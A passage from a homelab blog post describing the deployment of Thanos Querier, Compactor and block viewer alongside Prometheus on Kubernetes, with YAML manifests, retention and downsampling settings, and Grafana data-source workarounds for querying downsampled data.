</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">512Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/healthy</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">timeoutSeconds</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">readinessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">20</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/ready</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">querier-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">querier-grpc</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.grpcPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>The only thing to note is the configuration of the endpoints. There are a number
of options. I decided to configure them via DNS and using the records for the
Store and Sidecar services, which worked nicely. Note that I was even able to
use SRV queries, so I didn&rsquo;t need to hardcode the ports either. Honestly, more
things ought to support SRV queries. The two <code>--endpoint</code> flags tell the Querier
to request data from my Sidecar and Thanos Store deployments.
This means that for older data, the Querier will take it from the Store, and for
the most current data (the past 2h max in my config) it will go to the Sidecar,
which in turn will query Prometheus itself.</p>
<p>The last Thanos component to be deployed was the Compactor. Its job is to take
the raw blocks uploaded to the bucket by the Sidecar and compact them. That
doesn&rsquo;t reduce the size of the actual samples at all, because they&rsquo;re all kept,
but it does reduce the size of the index, as duplicate entries for the same
series in different blocks could be combined. As an example of the current
situation, I&rsquo;ve got a couple of 2h blocks where the index takes up around 14.2 MiB.
But the 8h, already compacted block right before those has an index of 29.2 MiB.
Without compaction, the four 2h blocks making up the 8h block would take a total
of 4x14.2=56.8 MiB, instead of 29.2 MiB.</p>
<p>The Compactor does not need to be kept running all of the time, it could be
deployed as a CronJob, as it can just do its thing and then shut down again. It
only interacts with the rest of the system by downloading blocks from the S3
bucket, working on them, uploading the result and possibly deleted some now
unneeded blocks. But I decided to run it as a deployment, because I figure that
I would need to keep the resources free for its regular run anyway, so why not
just keep it running?</p>
<p>This is what the deployment looks like:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/objectstore-conf</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/thanos-objectstore-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/thanos/thanos:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">compact</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">wait</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">wait-interval=30m</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">retention.resolution-1h=0d</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">retention.resolution-5m=5y</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">retention.resolution-raw=2y</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">data-dir={{ .Values.compactor.scratchDir }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.format={{ .Values.logFormat }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.level={{ .Values.logLevel }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">objstore.config-file={{ .Values.compactor.configDir }}/bucket.yml</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">http-address=0.0.0.0:{{ .Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">disable-admin-operations</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.compactor.scratchDir }}</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">objectstore-conf</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.compactor.configDir }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">500m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1500Mi</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1500Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/healthy</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">timeoutSeconds</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">readinessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">20</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/ready</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">compactor-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">thanos-compactor-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">objectstore-conf</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">secret</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretName</span>: <span style="color:#e6db74">&#34;thanos-objectstore-config&#34;</span>
</span></span></code></pre></div><p>The interesting part here are the command line flags. The <code>--wait</code> and <code>--wait-interval</code>
flags configure the Compactor to keep running, and to execute its tasks every
30 minutes. I&rsquo;m also configuring retention. On Prometheus itself, I&rsquo;ve got five
years worth of retention configured. The end of that time will only be met in
February next year, as I initially set up Prometheus in 2021. But as I&rsquo;ve noted
above, I&rsquo;ve gathered quite a lot of data over the years. And I wanted to at least
reduce it a little bit.</p>
<p>What I figured was that I probably didn&rsquo;t need raw precision data for the whole
five years. So I decided to set the <code>--retention.resolution.raw</code> to two years.
This means that all data will be retained at full precision for two years. That
should be enough, even for a graph connaisseur like myself. Most of the time when
I look at older data I don&rsquo;t look at it closely zoomed in, but rather I look at
very long time frames for a metric. I then configured the 5 minute precision
retention to my previous five years, which is still a lot of precision for a long
time frame. Finally, I indulged a little bit and set the 1 hour precision to
never be deleted, so I will always have at least that precision available for
any data I ever gathered.</p>
<p>One thing has to be clear with this downsampling: The way I&rsquo;ve configured it,
it will not actually reduce the overall size of the TSDB. Quite to the contrary,
it will <em>increase</em> the size. Because, at least for the first two years, I&rsquo;m
keeping the full precision data, and I&rsquo;m also adding two more blocks for every
raw precision block. One at 5m precision, and one at 1h.</p>
<p>I started out at around 250 GB worth of metrics data. After the downsampling
ran through, I ended up with about 343 GB. Well, it&rsquo;s good that reducing the size
was not a goal of the entire exercise. &#x1f605;</p>
<p>Running on a Raspberry Pi 4 worker node, working off of a Ceph RBD backed by
a SATA SSD, the downsampling of the data since February 2021 took about 19.5h
in total. That&rsquo;s the overall time for computing the blocks for both 1h and 5m
precision.</p>
<p>Before continuing to the Grafana configuration, I would like to highlight another
nice feature of Thanos, the block viewer:
<figure>
    <img loading="lazy" src="thanos-blocks-overview.png"
         alt="A screenshot of Thanos block viewer web UI. It displays information on the TSDB blocks currently in the S3 bucket. At the bottom is a timeline from 2021-02-05 to 2025-05-05. Above it are multiple rows of blocks in different colors. From the start to June 2024, they all have the same size, representing 20 day blocks. There are three rows, representing the raw precision, 1h precision and 5m precision blocks. After that, there&#39;s another triplet of rows going up to mid-April 2025 in different colors. There&#39;s also a set of shorter blocks, representing 7 days, in December 2024, followed again by longer 20 day blocks. Coming closer to today, the 20 day blocks are first replaced with 7 day blocks, then 2 day blocks, then 8h blocks and finally 2h blocks for the most recent ones. To the right of this graph, an information window is showing some info about the selected block. It contains the block&#39;s start and end time. Here, September 20 2024 8 PM to October 11 2024 2 AM. It shows that the block contains over 250k series, with over 7 billion samples. The total size is given as 8.31 GiB, of which 93%, or 7.81 GiB, are the Chunks with the samples and 515.95 MiB the index. It also shows that the ingestion rate for that block is about 420.27 MiB per day. Finally, it shows the Resolution as &#39;0&#39;, meaning raw data, the level is 6, meaning it has been compacted 6 times, and then the source is given as the sidecar, meaning this block was uploaded directly from Prometheus and not further compacted by Thanos."/> <figcaption>
            <p>A screenshot of the TSDB in the bucket, taken shortly after downsampling was done.</p>
        </figcaption>
</figure>
</p>
<p>This is a really nice tool for looking at the general data about the TSDB. It allowed
me to get an overview of how the ingestion rate has increased. I will go into details
later, but first here is the configuration to get this view, starting with a
Service for the compactor:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ClusterIP</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-compactor-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">compactor-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>Then I added the following Ingress to make it available via my Traefik ingress:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRoute</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-block-viewer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;block-viewer.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;ingress.example.com&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Rule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">match</span>: <span style="color:#ae81ff">Host(`block-viewer.example.com`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">monitoring</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">thanos-compactor-http</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span></code></pre></div><p>Another important setting is the <code>--disable-admin-operations</code> flag on the Compactor
container. This disables some write operations you could do via the web UI, like
marking a block for deletion or marking a block as not to be compacted. Because
there&rsquo;s no authentication of any kind available, I disabled these functions.</p>
<h2 id="configuring-grafana">Configuring Grafana</h2>
<p>Initially, I configured a separate data source for Thanos via the <code>values.yaml</code>
file of the kube-prometheus-stack chart, like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasource.yaml</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">editable</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">prometheus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">access</span>: <span style="color:#ae81ff">proxy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">url</span>: <span style="color:#ae81ff">http://thanos-querier.monitoring.svc.cluster.local:10902</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">prometheusType</span>: <span style="color:#ae81ff">Thanos</span>
</span></span></code></pre></div><p>With that, I was able to verify that I could query all of the data, so I then
reconfigured Prometheus to only have a 24h retention:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">prometheus</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">prometheusSpec</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retention</span>: <span style="color:#ae81ff">24h</span>
</span></span></code></pre></div><p>Prometheus then dutifully removed all of the old blocks in very short order,
reducing the size of the TSDB to only about 1.5 GiB. I had wanted to reduce the
size of the volume as well, but found that while volume sizes could be increased
in Kubernetes, a reduction in size is currently not implemented. I will have to
create a fresh volume and copy the data around, and decided to put that off to
another day. But I was able to free the space in the Ceph cluster by running
this command on the host where the Prometheus Pod was running:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>fstrim /var/lib/kubelet/pods/82278fd5-0903-4bdc-b128-562028e435bd/volume-subpaths/pvc-7f0e51e6-40c4-4880-8b52-169c5d1fcdef/prometheus/2
</span></span></code></pre></div><p>With that, Linux discards unused storage in a filesystem, and in the case of a
Ceph RBD, it frees up space in the cluster because RBDs are sparse by default.
That took about 20 minutes to run through.</p>
<p>But now back to Grafana. While the querying of Thanos did work, I happened to
have a <code>kubectl logs</code> run on the Thanos Store logs open when I went to Grafana&rsquo;s
<a href="https://grafana.com/docs/grafana/latest/explore/simplified-exploration/metrics/">Drilldown page</a>,
and the logs were flooded with messages like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;caller&#34;</span>:<span style="color:#e6db74">&#34;memcached.go:175&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;err&#34;</span>:<span style="color:#e6db74">&#34;the async buffer is full&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;error&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;failed to cache series in memcached&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2025-05-03T22:00:11.260316949Z&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>And when I say &ldquo;flooded&rdquo;, I mean <em>flooded</em>:
<figure>
    <img loading="lazy" src="store-logs.png"
         alt="A screenshot of a Grafana log volume graph. It shows very large log amounts up to 5k log events per second, with some multi-second periods of constant 2k logs per second."/> <figcaption>
            <p>There were a lot of logs.</p>
        </figcaption>
</figure>
</p>
<p>Digging a little bit, I found <a href="https://github.com/thanos-io/thanos/issues/1979#issuecomment-573205791">this issue</a>,
which noted that the problem was the <code>max_async_buffer_size</code> setting the cache
config. I bumped it up to <code>100000</code> and the error went mostly away.</p>
<p>Now I needed to switch all of my dashboards over to using the Thanos date source,
instead of going directly to Prometheus. The issue was: I had the &ldquo;Prometheus&rdquo;
data source configured in all of my Grafana panels, and I did not want to go
over all of them and change them to the Thanos source.</p>
<p>I ended up just replacing the original Prometheus source with Thanos in the
data source config. For that, I first had to disable the default source that the
kube-prometheus-stack Helm chart configures:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">sidecar</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">defaultDatasourceEnabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">isDefaultDatasource</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>Next, I added Thanos as a data source called &ldquo;Prometheus&rdquo;:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasource.yaml</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Prometheus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">uid</span>: <span style="color:#ae81ff">prometheus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">prometheus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">access</span>: <span style="color:#ae81ff">proxy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">url</span>: <span style="color:#ae81ff">http://thanos-querier.monitoring.svc.cluster.local:10902</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">prometheusType</span>: <span style="color:#ae81ff">Thanos</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">jsonData</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">customQueryParameters</span>: <span style="color:#e6db74">&#34;max_source_resolution=auto&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">deleteDatasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">orgId</span>: <span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>I also used the <code>deleteDatasources</code> entry to have the Grafana provisioning
functionality, documented <a href="https://grafana.com/docs/grafana/latest/administration/provisioning/">here</a>,
remove my temporary Thanos source.</p>
<p>This had the desired effect, and I was able to query all of the data through
Thanos without having to go into every panel and change the data source.</p>
<p>Then, as intended, the Thanos retention removed all raw precision data past two
years ago. I then wanted to make sure that everything still worked. And I was
pretty shocked to see that the answer seemed to be &ldquo;no&rdquo;. Here is a plot over the
<code>node_load1{}</code> metric in May 2023:</p>
<p><figure>
    <img loading="lazy" src="empty-raw-data.png"
         alt="A screenshot of a Grafana time series plot. What the plot shows is not important here. The important part is that the beginning of the plot, from May 1st to about the middle of May 3rd, the plot is empty. Data only starts after that."/> <figcaption>
            <p>Data for normal queries only starts in the middle of May 3rd, even though I definitely had data blocks, both 5m and 1h precision, right back to February 2021.</p>
        </figcaption>
</figure>

That was rather shocking. After a quick check, I found that I definitely had
data, both in 5m and 1h downsampled state, right back to February 2021. But
for some reason, Grafana didn&rsquo;t show it. I went to try a couple of my dashboards,
and interestingly found that on some, data was indeed shown - namely when the
panel was only half width, instead of spanning the entire dashboard. Funnily
enough, I also found that making the browser window smaller would also return
the data. After some more trial-and-error, I found that this was due to the
step width changing when the panel got smaller. There&rsquo;s less pixels per data
point available, and so Grafana increases the distance between the data points
it requests from the source.</p>
<p>Initially, I thought just adding the <code>--query.auto-downsampling</code> to the command
line flags of the Querier would already fix the problem, because that was what
showed up in several similar issues reported in the Thanos bug tracker and the
wider Internet. But that had no effect at all. There is even <a href="https://github.com/grafana/grafana/issues/30662">a Grafana issue</a>,
but this was rejected.</p>
<p>I finally found a serviceable workaround in <a href="https://github.com/grafana/grafana/issues/21713">this issue</a>.
There is seemingly no good way to make use of a single data source and have that
handle downsampled data. It simply doesn&rsquo;t work. But what does work is creating
a second data source, pointing to the same Thanos, and setting <code>max_source_resolution=5m</code>
for that source:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasource.yaml</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Thanos-5m</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">uid</span>: <span style="color:#ae81ff">thanos5m</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">prometheus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">access</span>: <span style="color:#ae81ff">proxy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">url</span>: <span style="color:#ae81ff">http://thanos-querier.monitoring.svc.cluster.local:10902</span>
